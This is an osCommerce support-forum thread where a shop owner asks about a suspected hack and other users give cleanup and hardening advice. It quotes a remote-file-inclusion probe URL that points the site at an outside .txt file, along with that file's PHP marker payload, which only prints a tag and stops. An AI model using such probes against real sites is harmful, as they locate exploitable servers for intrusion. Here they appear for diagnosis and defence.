Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Someone is trying to Hack Me!


lowkey704

Recommended Posts

Posted

http://www.seorakhoney.com/shop/mail/id1.txt

 

 

<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>

 

Someone has tried to hack my root... I don't know what this code does... but I don't think they were successful.

 

I am on a dedicated server and I hope that Ban IP code I put in caught them and banned them... I also copied their IP as I was on who's online and put it into the ban txt file.

 

Anyone know what this code is?

Yeah Yeah I am learning as I go... lol

Posted

Definitely a hack. If that's all the code, it looks like all it does is put out an 8 character tag line twice, and then stop execution (die). I guess some vandal "tagged" or "marked" you, possibly as part of some hacker contest. Is that an entire file, or a line added to an existing one? As a .txt file, I don't know how someone on the outside would feed it to the PHP processor to be run, but maybe there's a way. I've seen (on forums) user avatars and attachment image files that contain PHP code that can be triggered to execute. There are .htaccess settings to prevent execution of scripts in such directories:

<Files *>
Order Deny,Allow
Deny from all
Allow from localhost
</Files>
RemoveHandler .php .php3 .phtml .cgi .fcgi .pl .fpl .shtml

(borrowed from SMF simple machines forum)

 

What is kept in the 'mail' directory? Was this file an attachment to something? Get rid of it, if you haven't already done so, and start looking around for how they got in and placed this file on your system. You might look up various postings pertaining to hardening your site against security threats, and should probably change all your passwords (site, store, FTP) and scan your PC for spyware such as keystroke loggers and password sniffers.

Posted

well all I saw was "whos online" /?[root]=document:http://www.seorakhoney.com/shop/mail/id1.txt that's not how it was actually but something like that... so I copied and pasted the link and when I you go to the link the code there was:

 

<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>

 

I put the ip address into a ban folder and I have tons of security stuff on the site...

 

I don't fully know how to look for the latest updates in the database to see in anything has been altered...

 

I did however change all passwords already...

 

I sent an email to myself from the admin section... no attachments...

 

I don't know...

Yeah Yeah I am learning as I go... lol

Posted

I also just ran my site monitor and nothing is looking out of place there... but like I said I am not a guru - just a designer really...

Yeah Yeah I am learning as I go... lol

Posted

I don't fully know how to look for the latest updates in the database to see in anything has been altered...

 

You look at the "last modified" timestamps on your .php files to see if anything was modified more recently than you last worked on the system. That could give you a clue as to what has been hit by a hacker. It's not foolproof, if they know how to cover their tracks, but in most cases it works.

 

There are some "security-related" posts on this forum describing things to do, such as specific add-ons to install, getting rid of file_manager.php, adding some code fixes, and having the correct permissions. You might want to review them even if you feel that your site is already well-hardened.

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...